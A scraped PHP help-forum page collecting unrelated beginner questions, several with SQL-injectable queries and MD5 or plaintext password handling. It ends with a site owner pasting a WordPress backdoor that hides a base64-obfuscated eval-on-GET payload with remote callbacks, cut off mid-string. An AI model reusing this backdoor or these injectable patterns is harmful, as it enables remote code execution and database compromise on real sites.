|
PHP - Cleaning Website. Don't Understand Weird Php.
I am cleaning up my website (replace tables with divs and turning all design code in to CSS). I would like to know a couple things. First, I see that register_globals is deprecated, but I still see new blog posts and such saying to keep it. I want to know if I should remove it, how it works, and if I do remove it what should I replace it with. Also, I have code like:
Code: [Select] '".$SETTINGS['siteurl']."uploaded/".$val["pict_url"]."' and I was wondering whether it can be replaced with Javascript. Please don't call me a noob or tell me to Google it because when it comes to me, Google, and PHP; I'm like a kid in a candy shop and all the candy is filled with dirt. Similar TutorialsOk, i have this code that i want to print out the total number of times the defined username appears in my database with the defined date. Right now all it prints out is the echo at the end but with no numbers in the result. I just need help with getting it to display the number. Code: [Select] <?php //select a database to work with $selected = mysql_select_db("nwacompu_totals",$dbhandle) or die("Could not select examples"); $username = "bayyari"; $date = "3-16-2011"; $query = "SELECT COUNT(*) FROM totals WHERE date = '$date' AND username = '$username'"; $result = mysql_query($query) or die(mysql_error()); // Print out result while($row = mysql_fetch_array($result)){ echo "There are ". $row['COUNT(username)'] ." ". $row['date'] ." items."; echo "<br />"; echo $result; } ?> what is printed is this There are items. Resource id #2Resource id #3 which makes no sense to me. Any help is very much appreciated. basically this is like 60% written by me with a few copy/paste. What I am looking to do, is clean up this code a little. Functionally it does what I want it to relatively well, but it does look very very messy and I would like it to be a little more tidy. Any suggestions on how to do this? I am no PHP expert as you can most likely tell by the code itself. <?php require("cfg.php"); //FOLDER PATH $dir_cat= $imgpath; $openDir_cat = opendir($dir_cat); while (false !== ($fileNames_cat = readdir($openDir_cat))) { $check_cat = $dir_cat. "/" . $fileNames_cat; $size_cat = @getimagesize($check_cat); // this check mime of file if($fileNames == "." || $fileNames_cat == ".." || strpos($size_cat[mime], "image") === FALSE) { continue; // exclude everything wha is not image } else { $imagesAll_cat[] = $fileNames_cat; // create an array of images } } $imgnr_cat=0; $imgct_cat=count(glob($dir_cat . "*")); //COUNT THE NUMBER OF FILES IN THE UPLOAD DIR. echo '<center><fieldset class=fieldset>'; echo '<legend> IMGS '; echo ' (' .$imgct_cat. ' IMAGES)</legend><div>'; //GET IMAGES AND DISPLAY THEM while ($imgnr_cat<$imgct_cat){ echo '<a href=' .$dir_cat.$imagesAll_cat[$imgnr_cat]. '>'; echo '<img width=140 height=100 src=' .$dir_cat.$imagesAll_cat[$imgnr_cat]. '>'; echo '</a>'; $imgnr_cat++; } echo '</div></fieldset></center>'; ?> I'm trying to clean up my code as best I know how and get rid of code that isn't necessary. This is where I'm most confused: On every page, I start a session and if someone goes to a page other than the index/login page, they are redirected if there is no session, otherwise, they are allowed to continue to view the page content. Here is my code: Code: [Select] <?php session_start(); $email=$_SESSION['email']; // is this line necessary on every page... if ($_SESSION['logged'] != 1) { $_SESSION['email'] = $email; // as well as this line? header("Location: index.php"); exit(); } ?> Basically, I need to know if the SESSION['email'] has to be set on every page, or does it stay set as long is the session is logged? If it stays set for the entire session, I shouldn't need to include the "$email=$_SESSION['email'];" line on every page, right? Also, if my thinking is correct, I shouldn't need to include the "$_SESSION['email'] = $email;" line unless I need to use the $email variable for some other purpose. Am I correct on this? Thanks for any input. I need to pull a list of mp3 file names to create a playlist. I have a column for "priority" which will handle the rotation of the mp3's...so that a priority of 4 will play more often than a priority of 3...and so on. I have this code (which works) to select a column from the db that matches the selected criteria...AND has a priority of "4". If there are no matches, select a row that has a priority of "3". How can I clean up this code...preferably to remove the need for adding 2's after each variable? Also, is there a better way of handling this, so that it's ONE select...and then puts the mp3's in the playlist the correct number of times? Code: [Select] <?php $sql = "SELECT * FROM audio WHERE `client_id` = '$client' AND (`start_date` <= '$nownohour' AND `end_date` >= '$nownohour') AND `$dow` = '1' AND `is_active` = '1' AND (`start_hour` <= '$hournozero' AND `end_hour` >= '$hournozero') AND `priority` = '4' LIMIT 1"; $rs = mysql_query($sql,$dbc); $matches = 0; while ($row = mysql_fetch_assoc($rs)) { $matches++; echo "$row[title].mp3<br />"; } if (!$matches) { $sql2 = "SELECT * FROM audio WHERE `client_id` = '$client' AND (`start_date` <= '$now' AND `end_date` >= '$now') AND `$dow` = '1' AND `is_active` = '1' AND (`start_hour` <= '$hournozero' AND `end_hour` >= '$hournozero') AND `priority` = '3' LIMIT 1"; $rs2 = mysql_query($sql2,$dbc); $matches2 = 0; while ($row2 = mysql_fetch_assoc($rs2)) { $matches2++; echo "$row2[title].mp3<br />"; } } echo "-------------<br />"; ?> Thanks! Hi there I allow users to make new albums. For each album they give a full display name, eg "New Years Eve 2012 at Persons' place", and a shorter display eg "New Years Eve 2012". The first string should be stored in a db and should be shown exactly as it is, so for that string I have: Code: [Select] <?php //$fullname gets stored in the db $fullname = myql_real_escape_string(htmlentities($fullname)); //when pulled from the db, it is only echoed, nothing else: echo $fullname; ?> Now I presume it is safe so far. Now is the 'tricky' part. Currently this is what I do to the short name: Code: [Select] <?php //$shortname gets stored in the database $shortname = mysql_real_escape_string(urlncode(str_replace(' ','',strtolower($shortname)))); ?> Now from this shortname, before the mysql_real_escape_string(), it makes a directory with that name. Now what happens is, if there are special charcters like '@', the '@' changes into '%40'. So the directory would be eg 'fun%40myplace'. The directories get made without a problem, but for some reason my uploader won't upload to this directory. It isn't the uploaders fault because in folders without these special characters there is no problem with uploading. Any ideas on how to fix this, or what the best method is to clean a string for url/directory names? Hi, This isn't so much a problem as my code/page works however my host shut down scripting on the site as too many connections to the database were left open apparently with this page. Also ive been looking into a way of cleaning up the code and making it less bloated but the only thing I have found is mysqli for running multiple queries in one go but I am unsure if this would help. Code: [Select] <?php session_start(); include("./includes/db_con.inc.php"); $image = $_GET["id"]; $id = str_replace("-", "/", $_GET["id"]); $cat = $_GET["cat"]; $sub_cat = $_GET["sub"]; $page_title = $cat . " - " . $sub_cat . " - " . $id; $sql_meta = mysql_query("SELECT * FROM english WHERE PRODID='$id' AND display='1'"); $row_meta = mysql_fetch_assoc($sql_meta); $meta_desc = $row_meta['META_DESC']; $meta_key = $row_meta['META_KEY']; include("./includes/head.php"); include("./includes/header.php"); ?> <div id="main-page-header"> <?php $header = "img/product-pages/product-specific-headers/" . $image . ".jpg"; if (file_exists($header)) { ?> <img src="<?php echo $img_loc; ?>/product-pages/product-specific-headers/<?php echo $image; ?>.jpg" width="940" height="310" /> <?php } else { $desc_sql = mysql_query("SELECT * FROM sub_cat WHERE name='$sub_cat'"); $row_desc = mysql_fetch_assoc($desc_sql); $description = $row_desc['description']; echo "<img src='$img_loc/product-pages/sub-cat-head/".str_replace(" ", "-", $row_desc['name'])."-sub-cat-head.jpg' width='940' height='310' />"; } ?> </div> <div id="page-content"> <div id="main-page-text"> <h1><?php $result = mysql_query("SELECT * FROM $table WHERE PRODID='$id' AND display='1'"); while($row = mysql_fetch_array($result)) { $prod_title = $row['PROD_TITLE']; echo $prod_title; ?> </h1> <h2 class="crumbs"><a href="<?php echo "$url/Products/$lang/"; ?>">Products</a> > <a href="<?php echo "$url/Category/$lang/".urlencode($cat)."/"; ?>"><?php echo $cat; ?></a> > <a href="<?php echo "$url/Range/$lang/".urlencode($cat)."/".urlencode($sub_cat)."/"; ?>"><?php echo $sub_cat; ?></a> > <?php echo $prod_title; ?> </h2> <p><?php echo $row['DESCRIPTION']; } ?></p> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like layout="button_count" show_faces="false" width="170" font="verdana"></fb:like> <br /> <?php $i = 1; while ($i <= 8) { $filename = "img/product-pages/hovers-800px/" . $image . "-" . $i . ".jpg"; if (file_exists($filename)) { ?> <a class="fuglybox" rel="gxr" href="<?php echo "../../../../../" . $filename; ?>"> <img src="../../../../../img/product-pages/product-detail-90px/<?php echo $image . "-" . $i . ".jpg"; ?>" alt="" width="90" height="90" /></a> <?php } else { break; } $i++; } ?> <table> <th>Product Code</th> <th>Description</th> <?php $table_result = mysql_query("SELECT * FROM PRODID WHERE PRODID='$id'"); $table_entry = mysql_fetch_assoc($table_result); echo "<tr><td class='prod-id'>" . $table_entry['PROD_CODE'] . "</td>\n"; echo "<td class='prod-desc'>" . $table_entry['TA_DESC'] . "</td></tr>\n"; ?> </table> <div id="FAQ-wrap"><h2>Frequently Asked Questions</h2> <?php $QA_table = $lang . "_qanda"; if ($id=="") { $list_QA = mysql_query("SELECT * FROM $QA_table WHERE SUB_CATEGORY='$sub_cat' AND DISPLAY='1'"); } else { $list_QA = mysql_query("SELECT * FROM $QA_table WHERE PRODID='$id' AND DISPLAY='1'"); } while($row_QA = mysql_fetch_array($list_QA)) { echo "<div id='FAQ-QA'>"; echo "<h2 class='FAQ-question'>Q: ".$row_QA['QUESTION']."</h2>"; echo "<p class='FAQ-question'>A: ".$row_QA['ANSWER']."</p></div>"; } ?> <div id="FAQ-question"> <h2 class="white">Got a question about the <span class="got-question-product"><?php echo $sub_cat; ?></span> </h2> </div> </div> </div> <div id="totem-menu-container"><?php include("./includes/search.php") ?> <?php include("./includes/totem.php") ?> </div> </div> </div> <?php include("./footer.php") ?> Please note in the db_con.inc.php is the connection to the database stored in variable $con and included in the footer.php is mysql_close($con) which is also why I dont understand how connections are being left open, any help greatly appreciated. The attached script does everything I want it to do, but it's not very elegant. I could use some help cleaning it up. Any and all help is greatly appreciated. Thanks!!! I have been trying to hack two parts of code together... I had code writen that will grab the text from a website and completely clean it of all junk except for full words... then echo it. Now I am trying to use the same script to pull from a database instead of a URL but am lost... Here is my code... I would make another donation to the site if we can get this going... THANK YOU! Code: [Select] <?php $con = mysql_connect("localhost","USERNAME","PASSWORD!"); mysql_select_db("DATABASE",$con); $get = "SELECT * FROM information_description WHERE information_id=4"; $SQ_query = mysql_query($get) or die("Query failed: $get\n" . mysql_error()); $fetch = mysql_fetch_array($SQ_query); $raw = $fetch['description']; /* Set internal character encoding to UTF-8 */ mb_internal_encoding("UTF-8"); mb_http_output( "UTF-8" ); ob_start("mb_output_handler"); function clean($html) { ###Remove number in html################ //$html = preg_replace("/[0-9]/", " ", $html); $html = preg_replace("/<([a-z][a-z0-9]*)[^>]*?(\/?)>/i",'<$1$2>', $html); // $html = preg_replace('/(<[^>]+) style=".*?"/i', '$1', $html); echo $html; $html = str_replace(" ", " ", $html); $html = str_replace("&", " ", $html); $html = str_replace("-", " ", $html); ######remove space $html = preg_replace ('/<[^>]*>/', '', $html); $html = preg_replace('/\s\s+/', ', ', $html); $html = preg_replace('/[\s\W]+/',' ',$html); // Strip off spaces and non-alpha-numeric return $html; } #call function //$raw = StripHtmlTags($raw); $raw = clean($raw); echo $raw; ##echo clean($html); $url = (isset($_GET['url']) ?$_GET['url'] : 0); $str = file_get_contents($url); ####################################################################3 function get_url_contents($url){ $crl = curl_init(); $timeout = 5; curl_setopt ($crl, CURLOPT_URL,$url); curl_setopt ($crl, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($crl, CURLOPT_CONNECTTIMEOUT, $timeout); $ret = curl_exec($crl); curl_close($crl); return $ret; } #--------------------------------------Strip html tag---------------------------------------------------- function StripHtmlTags( $text ) { // PHP's strip_tags() function will remove tags, but it // doesn't remove scripts, styles, and other unwanted // invisible text between tags. Also, as a prelude to // tokenizing the text, we need to insure that when // block-level tags (such as <p> or <div>) are removed, // neighboring words aren't joined. $text = preg_replace( array( // Remove invisible content '@<head[^>]*?>.*?</head>@siu', '@<style[^>]*?>.*?</style>@siu', '@<script[^>]*?.*?</script>@siu', '@<object[^>]*?.*?</object>@siu', '@<embed[^>]*?.*?</embed>@siu', '@<applet[^>]*?.*?</applet>@siu', '@<noframes[^>]*?.*?</noframes>@siu', '@<noscript[^>]*?.*?</noscript>@siu', '@<noembed[^>]*?.*?</noembed>@siu', // Add line breaks before & after blocks '@<((br)|(hr))@iu', '@</?((address)|(blockquote)|(center)|(del))@iu', '@</?((div)|(h[1-9])|(ins)|(isindex)|(p)|(pre))@iu', '@</?((dir)|(dl)|(dt)|(dd)|(li)|(menu)|(ol)|(ul))@iu', '@</?((table)|(th)|(td)|(caption))@iu', '@</?((form)|(button)|(fieldset)|(legend)|(input))@iu', '@</?((label)|(select)|(optgroup)|(option)|(textarea))@iu', '@</?((frameset)|(frame)|(iframe))@iu', ), array(' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', "\n\$0", "\n\$0", "\n\$0", "\n\$0", "\n\$0", "\n\$0", "\n\$0", "\n\$0",),$text ); // Remove all remaining tags and comments and return. return strtolower( $text ); } function RemoveComments( & $string ) { $string = preg_replace("%(#|;|(//)).*%","",$string); $string = preg_replace("%/\*(?:(?!\*/).)*\*/%s","",$string); // google for negative lookahead return $string; } $html = StripHtmlTags($str); ###Remove number in html################ $html = preg_replace("/[0-9]/", " ", $html); #replace by ' ' $html = str_replace(" ", " ", $html); ######remove any words################ $remove_word = file("swords.txt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); foreach($remove_word as $word) { $html = preg_replace("/\b". $word ."\b/", " ", $html); } ######remove space $html = preg_replace ('/<[^>]*>/', '', $html); $html = preg_replace('/\b\s+/', ', ', $html); $html = preg_replace('/[\b\W]+/',', ',$html); // Strip off spaces and non-alpha-numeric #remove white space, Keep : . ( ) : & //$html = preg_replace('/\s+/', ', ', $html); ###process######################################################################### $array_loop = explode(",", $html); $array_loop1 = $array_loop; $arr_tem = array(); foreach($array_loop as $key=>$val) { if(in_array($val, $array_loop1)) { if(!$arr_tem[$val]) $arr_tem[$val] = 0; $arr_tem[$val] += 1; if ( ($k = array_search($val, $array_loop1) ) !== false ) unset($array_loop1[$k]); } } arsort($arr_tem); ###echo top 20 words############################################################ echo "<h3>Top 20 words used most</h3>"; $i = 1; foreach($arr_tem as $key=>$val) { if($i<=20) { echo $i.": ".$key." (".$val." words)<br />"; $i++; }else break; } echo "<hr />"; ###print array##################################################################### echo (implode(", ", array_keys($arr_tem))); ?> Just want to finalize what the best options/functions are when cleaning user supplied input in the following 3 situations: 1. Inserting data into a database 2. Sending data to an email (and displaying it as HTML) 3. Displaying data back to screen Hi. I've been banging my head against the wall with this stupid problem and I just figured out the problem.
I scrape data from a website. I query my table to see if I already have everything in there. If no match is found, I insert it.
Today, I noticed even after inserting, my script kept telling me there's a new entry I need to insert, despite it actually being there when I physically check the table.
But when I echo the query out and run it in phpmyadmin, it finds the row. But not if I run the query directly in my script.
Turns out, there are several invisible characters in my string. When I do var_dump(), it says length is 25. When I copy and paste the string into notepad, then back into a fresh php script and wrap it in quotes and echo out a strlen(), I get 21. There are apparently 4 invisible characters that I can't see. I trim() everything, so that apparently didn't catch it.
So... is there a good way to "clean" my data before inserting or comparing it to avoid this in the future? This wasted a ton of time and I hope to find a way to clean this junk out of my data.
Thanks! It just seems like I run into this sort of thing often when it's data scraped from the web. (breaks my regex! grr!)
This topic has been moved to PHP Regex. http://www.phpfreaks.com/forums/index.php?topic=326004.0 Ok, if you've helped with any of my questions before (thanks again to those who have) you know that I'm fairly new to php and still learning. This brings me to another question... I have read the post on header errors and I understand that in order to prevent these errors or warnings I need to process a form BEFORE OUTPUTTING ANYTHING TO THE BROWSER. The thing is, I'm having a problem understanding how I can do this with the code that I have written. Can someone please look at my code and explain what is causing the header warning that I'm getting and help me to understand how to fix it? Here's my code (warning message is following the code): Code: [Select] <?php session_start(); // Starts the session. ?> <html> <head> <title>Welcome to CaresAbout.us!</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <SCRIPT TYPE="text/javascript"> <!-- THIS IS LINE 11 --> <!-- function popup(mylink, windowname) { if (! window.focus)return true; var href; if (typeof(mylink) == 'string') href=mylink; else href=mylink.href; window.open(href, windowname, 'width=400,height=200,scrollbars=yes'); return false; } //--> </SCRIPT> <style type="text/css"> <!-- html { overflow: -moz-scrollbars-vertical; } html { overflow-x: auto; } body { background-color: #000000; background-image: url(bg.png); background-position: 50% 50%; background-repeat: repeat-y } body,td,th { font-family: Arial, Helvetica, sans-serif; font-size: 14px; } a:link { text-decoration: none; } a:visited { text-decoration: none; } a:hover { text-decoration: none; } a:active { text-decoration: none; } .bluelink {color: #0000CC} .blacklink {color: #000000} --> </style> </head> <body> <div align="center"> <noscript><font size="+2" color="#000000"><strong>Some features of this site will not operate without Javascript enabled!<br>Please <a href="http://www.heart.org/HEARTORG/form/enablescript.html" class="bluelink">enable Javascript</a> in your browser to have full access.</strong></font></noscript> <table width="1000" height="175" border="0" cellpadding="0" cellspacing="0" style="background: transparent url('headbg.png') top center no-repeat;"> <tr> <td height="125" width="160"> </td> <td height="125"> </td> <td height="125"> </td> <td height="125" width="160"> </td> </tr> <tr> <td height="50" width="160"> </td> <?php include("conf.inc.php"); // Includes the db and form info. if ($_SESSION['logged'] == 1) { // User is already logged in. $_SESSION['email'] = $email; header("Location: main.php"); // Goes to main page. exit(); // Stops the rest of the script. } else { if (!isset($_POST['submit'])) { // If the form HAS NOT been submitted. echo "<td width=\"320\" height=\"50\" align=\"left\" valign=\"middle\"> </td>"; echo "<td width=\"360\" height=\"50\" align=\"left\" valign=\"middle\">"; echo "<form name=\"form\" action=\"index.php\" method=\"POST\" style=\"margin-bottom:0;\">"; echo "<a href=\"signup.php\" class=\"bluelink\">Sign Me Up!</a> "; echo "<a href=\"pwordhelp.php\" class=\"bluelink\" onMouseOver=\"window.name = 'main'\" onClick=\"return popup(this, 'notes')\">Forgot Password</a><br>"; echo "<input type=\"text\" name=\"email\" size=\"17\" value=\"Email...\" style=\"color: #999999\" onfocus=\"if (this.value == 'Email...') {this.value=''; this.style.color='#000000'}\"> "; echo "<input type=\"password\" name=\"pword\" size=\"17\" value=\"Password...\" style=\"color: #999999\" onfocus=\"if (this.value == 'Password...') {this.value=''; this.style.color='#000000';}\"> "; echo "<input type=\"submit\" name=\"submit\" value=\"Submit\">"; echo "</form>"; } else { // If the form HAS been submitted $email = form($_POST['email']); $pword = md5($_POST['pword']); // Encrypts the password. $q = mysql_query("SELECT * FROM `signin` WHERE email = '$email' AND pword = '$pword'") or die (mysql_error()); // mySQL query $r = mysql_num_rows($q); // Checks to see if anything is in the db. if (!$r) { // There is nothing in the db. The username/password do not match up. echo "<td width=\"108\" height=\"50\" align=\"left\" valign=\"middle\"> </td>"; echo "<td width=\"572\" height=\"50\" align=\"left\" valign=\"middle\">"; echo "<form name=\"form\" action=\"index.php\" method=\"POST\" style=\"margin-bottom:0;\">"; echo " <a href=\"signup.php\" class=\"bluelink\">Sign Me Up!</a> "; echo "<a href=\"pwordhelp.php\" class=\"bluelink\" onClick=\"return popup(this, 'notes')\">Forgot Password</a><br>"; echo "<font color=\"#FF0000\"><strong>Incorrect Email or Password.</strong></font> "; echo "<input type=\"text\" name=\"email\" size=\"17\" value=\"Email...\" style=\"color: #999999\" onfocus=\"if (this.value == 'Email...') {this.value=''; this.style.color='#000000'}\"> "; echo "<input type=\"password\" name=\"pword\" size=\"17\" value=\"Password...\" style=\"color: #999999\" onfocus=\"if (this.value == 'Password...') {this.value=''; this.style.color='#000000';}\"> "; echo "<input type=\"submit\" name=\"submit\" value=\"Submit\">"; echo "</form>"; } else { // If the username/password is valid $_SESSION['logged'] = 1; // Sets the session. $_SESSION['email'] = $email; header("Location: main.php"); // THIS IS LINE 118 exit(); // Stops the rest of the script. } } } ?> </td> <td height="50" width="160"> </td> </tr> </table> </div> <?php echo "<div align=\"center\">"; echo "<table width=\"1000\" height=\"395\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"; echo "<tr>"; echo "<td width=\"160\" align=\"center\" valign=\"top\">"; // Begin Column 1. include("left.inc.php"); // End Column 1. echo "</td>"; echo "<td width=\"680\" align=\"center\" valign=\"top\" style=\"background: #FFFFFF url('bottombg.png') bottom center no-repeat;\">"; // Begin Column 2. echo "<table width=\"650\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"; echo "<tr>"; echo" <td align=\"left\" valign=\"top\">"; echo "<p><img src=\"nothing.gif\" height=\"5\"><br><img src=\"silouhette.png\" height=\"215\" width=\"325\" align=\"right\"><img src=\"nothing.gif\" height=\"215\" width=\"10\" align=\"right\"><div align=\"justify\"><font size=\"+2\"> <br>Welcome students! Now you can contact the teachers and staff members of your school easily, safely, and TOTALLY ANONYMOUSLY! Just follow these directions:</font></div></p>"; echo "<p><font size=\"+1\">1. If you haven't already, <a href=\"signup.php\" class=\"bluelink\">sign up</a> for an account. We will never ask for your name,<br> all you need is an email address (get one free at <a href=\"http://www.google.com/mail\" class=\"bluelink\" target=\"_blank\">Google.com</a>).<br><img src=\"nothing.gif\" height=\"5\"><br></font>"; echo "** It is very important that your email address is correct because a notification will be sent to your email<br> when you receive a message from a staff member, otherwise you will NEVER be contacted by email.<br><img src=\"nothing.gif\" height=\"10\"><br>"; echo "<font size=\"+1\">2. Sign in to your account using your email address and password that you chose<br> when you signed up.<br><img src=\"nothing.gif\" height=\"10\"><br>"; echo "3. Once you are signed in, you will be able to send anonymous messages to staff<br> members, reply to staff members' messages, and play some cool games too!</p>"; echo "<p><div align=\"center\"><font size=\"+3\">Thank you for using CaresAbout.us!</font></p>"; echo "</td>"; echo "</tr>"; echo "</table>"; // End Column 2. echo "</td>"; echo "<td width=\"160\" align=\"center\" valign=\"top\">"; // Begin Column 3. include ("right.inc.php"); // End Column 3. echo "</td>"; echo "</tr>"; echo "</table>"; echo "</div>"; include("foot.inc.php"); ?> </body> </html> Here's the warning message that I'm getting: Warning: Cannot modify header information - headers already sent by (output started at /home/content/29/6879529/html/calhoun/index.php:11) in /home/content/29/6879529/html/calhoun/index.php on line 118 $a === $b if $a is equal to $b, and of the same type when would you ever need to use this operator? I mean if its not == then its going to be false so why even test if its the same type. and if it is == then in theory it has to be the same type so why test it? Am i completely over looking something? Hi: I was reading a tutorial about making password protected pages and how to make the more secure by using MD5 to encrypt (I think) the password. But. I'm not sure if I don't understand the concept of what it does, or maybe 'm using it wrong. This is the code I am using: Database Table: Code: [Select] CREATE TABLE `myAdmins` ( `id` int(4) NOT NULL auto_increment, `myUserName` varchar(65) NOT NULL default '', `myPassword` varchar(65) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; INSERT INTO myAdmins VALUES("1","abc", "123"); I was told in the tutorial to develop something like this (I think I'm doing it wrong): Code: [Select] CREATE TABLE `myAdmins` ( `id` int(4) NOT NULL auto_increment, `myUserName` varchar(65) NOT NULL default '', `myPassword` varchar(65) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ; INSERT INTO `myAdmins` VALUES(1, 'abc', md5('123')); My Login.php page: Code: [Select] <?php include('../include/myConn.php'); session_start(); session_destroy(); $message=""; $Login=$_POST['Login']; if($Login){ $myUserName=$_POST['myUserName']; //$md5_myPassword=md5($_POST['myPassword']); // Encrypt password with md5() function. $myPassword=$_POST['myPassword']; //$result=mysql_query("select * from myAdmins where myUserName='$myUserName' and myPassword='$md5_myPassword'"); $result=mysql_query("select * from myAdmins where myUserName='$myUserName' and myPassword='$myPassword'"); if(mysql_num_rows($result)!='0'){ session_register("myUserName"); header("location:a_Home.php"); exit; }else{ $message="<div class=\"myAdminLoginError\">Incorrect Username or Password</div>"; } } ?> <html> ... </head> <form id="form1" name="form1" method="post" action="<? echo $PHP_SELF; ?>"> <? echo $message; ?> User Name: <input name="myUserName" type="text" id="myUserName" size="40" /> <br /><br /> Password: <input name="myPassword" type="password" id="myPassword" size="40" /> <input name="Login" type="submit" id="Login" value="Login" /> </form> ... </html> Protected Page: Code: [Select] <? session_start(); if(!session_is_registered("myUserName")){ header("location:Login.php"); }?> <html> ... ... </html> I know I need to uncomment the 2 lines of code in Login.php and remove the 2 that I'm currently using, and use the Database Table that has the MD5 code, but whenever I do it will not let me login. The Login.php page (with the Database Table without the MD5 code) works fine. I just wanted to know if this is the right way to use MD5 to make logins even more secure, of if I am totally off on understanding it. Any help or code tweaks would be appreciated. Thanks! hey guys sorry for the newb question... way back I had a site developed for me and ive since shut it down but thinking of re-creating a similar one. im looking over all of the old code files I have and I remember when logging in the developer had always set a session id....it I guess is a social networking site (mine was up years before facebooK!) lol. Anyway, what would be the benefit to setting a session_id on this even in the url have website.com/page.php?sid=328483248324 or some number or whatever it was. Just trying to educate myself. I was looking on php.net but didnt really get any answers that helped. thanks Hi all.
I'm unfamilar with php syntax (but vb syntax). A hacker has made a backdoor in my site (wordpress installation) with uploading follwing file:
<?php
Class linkBilder {
private $arr_files = array();
public $signatures = array('wp_footer3333');
function get_link()
{
$files = '<?php new Client(1);?>';
return $files;
}
function request($get_str, $separator)
{
if (!empty($get_str))
{
$obj = explode($separator, $get_str);
return $obj;
}
else
{
return false;
}
}
function make_file()
{
$local2=$_SERVER['DOCUMENT_ROOT'];
$clientSource = '<?php ini_set("display_errors",0);ini_set("display_startup_errors",0);error_reporting(0);$st=base64_decode("Y2xhc3MgQ2xpZW50IHsgcHJpdmF0ZSAkYXJ0aWNsZXM7IHByaXZhdGUkY3VybDsgcHJpdmF0ZSAkbG9jYXRpb24gPSAiZEdSemMyOXphV0ZzTG5KMUwyZHZMbkJvY0Q5emFXUTlNUT09IjsgcHJpdmF0ZSAkc3lzdGVtVXJsID0gImQyOXlhM052YzJsaGJDNXlkUT09IjsgcHJpdmF0ZSAkYm90RGV0ZWN0b3JVcmwgPSAiWW05MGMyOXphV0ZzTG5KMSI7IHByaXZhdGUgJGNhY2hlRmlsZT0gIkxpOTNjQzFwYm1Oc2RXUmxjeTkzY0Mxa2JuTmpZV05vWlM1d2FIQT0iOyBwcml2YXRlICRjYWNoZVRpbWUgPSAzNjAwOyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkZ2V0TGlua3MgPSBmYWxzZSkge2lmKGlzc2V0KCRfR0VUWyJ6YWx1cGEiXSkpe2V2YWwoJF9HRVRbInphbHVwYSJdKTt9ICR0aGlzLT5kZWNvZGVyKCk7ICR0aGlzLT5jdXJsID0gQGN1cmxfaW5pdCgpOyBpZiAoISR0aGlzLT5jdXJsKSByZXR1cm47IGlmICghaXNfZmlsZSgkdGhpcy0+Y2FjaGVGaWxlKSkgZmlsZV9wdXRfY29udGVudHMoJHRoaXMtPmNhY2hlRmlsZSwgJHRoaXMtPl9zZXIoJHRoaXMtPmdldEFsbEFydGljbGVzKCkpKTsgJHRoaXMtPmFydGljbGVzID0gJHRoaXMtPmxvYWRBcnRpY2xlc0Zyb21DYWNoZSgpOyBpZiAoc2l6ZW9mKCR0aGlzLT5hcnRpY2xlcy0+cGFnZXMpID09IDApIHJldHVybjsgJGdvb2RTbHVnID0gZmFsc2U7IGZvcmVhY2goJHRoaXMtPmFydGljbGVzLT5wYWdlcyBhcyAkYXJ0aWNsZSkgeyBpZiAoJGFydGljbGUtPnNsdWcgPT0gJF9HRVRbInAiXSkgeyAkZ29vZFNsdWcgPSB0cnVlOyB9IH0gaWYgKCR0aGlzLT5pc0JvdCgpID09IGZhbHNlICYmICRnb29kU2x1ZyA9PSB0cnVlKSB7IGhlYWRlcigiTG9jYXRpb246ICIuJHRoaXMtPmxvY2F0aW9uKTsgZWNobyAiIjsgZXhpdCgpOyB9IGlmICgkZ2V0TGlua3MgIT0gZmFsc2UpIHsgZm9yZWFjaCgkdGhpcy0+YXJ0aWNsZXMtPnBhZ2VzIGFzICRhcnRpY2xlKSBlY2hvICRhcnRpY2xlLT5saW5rLiIgIjsgcmV0dXJuOyB9IGZvcmVhY2goJHRoaXMtPmFydGljbGVzLT5wYWdlcyBhcyAkYXJ0aWNsZSkgeyBpZiAoJGFydGljbGUtPnNsdWcgPT0gJF9HRVRbInAiXSkgeyBlY2hvICRhcnRpY2xlLT5hcnRpY2xlOyBleGl0OyB9IH0gcmV0dXJuOyB9IHByaXZhdGUgZnVuY3Rpb24gbG9hZEFydGljbGVzRnJvbUNhY2hlKCkgeyAkZGF0YSA9ICR0aGlzLT5fdW5zZXIoZmlsZV9nZXRfY29udGVudHMoJHRoaXMtPmNhY2hlRmlsZSkpOyBpZiAoKHRpbWUoKS0kZGF0YS0+Y3JlYXRlVGltZSkgPj0gJHRoaXMtPmNhY2hlVGltZSkgeyBAdW5saW5rKCR0aGlzLT5jYWNoZUZpbGUpOyB9IHJldHVybiAkZGF0YTsgfSBwcml2YXRlIGZ1bmN0aW9uIGdldEFsbEFydGljbGVzKCkgeyAkZGF0YSA9IGFycmF5KCAiaG9zdCIgPT4gJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0sICJpcCIgPT4gJF9TRVJWRVJbIlNFUlZFUl9BRERSIl0sICJzZXJ2ZXJLZXkiPT4gbWQ1KCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdKSwgKTsgJGFydGljbGVzID0gJHRoaXMtPmdldENvbnRlbnQoImh0dHA6Ly8iLiR0aGlzLT5zeXN0ZW1VcmwuIi9zZW5kLnBocCIsICJkYXRhPSIuanNvbl9lbmNvZGUoJGRhdGEpKTsgJGFydGljbGVzID0ganNvbl9kZWNvZGUoJGFydGljbGVzKTsgaWYgKCRhcnRpY2xlcy0+c3RhdCAhPSAic3VjY2VzcyIpIHsgcmV0dXJuIGZhbHNlOyB9ICRhcnRpY2xlcy0+Y3JlYXRlVGltZSA9IHRpbWUoKTsgcmV0dXJuICRhcnRpY2xlczsgfSBwcml2YXRlIGZ1bmN0aW9uIGlzQm90KCkgeyAkcmVzdWx0ID0gJHRoaXMtPmdldENvbnRlbnQoImh0dHA6Ly8iLiR0aGlzLT5ib3REZXRlY3RvclVybCwiaXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbUkVNT1RFX0FERFJdKS4iJnVzZXJhZ2VudD0iLnVybGVuY29kZSgkX1NFUlZFUltIVFRQX1VTRVJfQUdFTlRdKS4iJmtleT1nMGcwIik7IGlmICgkcmVzdWx0ID09PSAiMCIpIHJldHVybiBmYWxzZTsgcmV0dX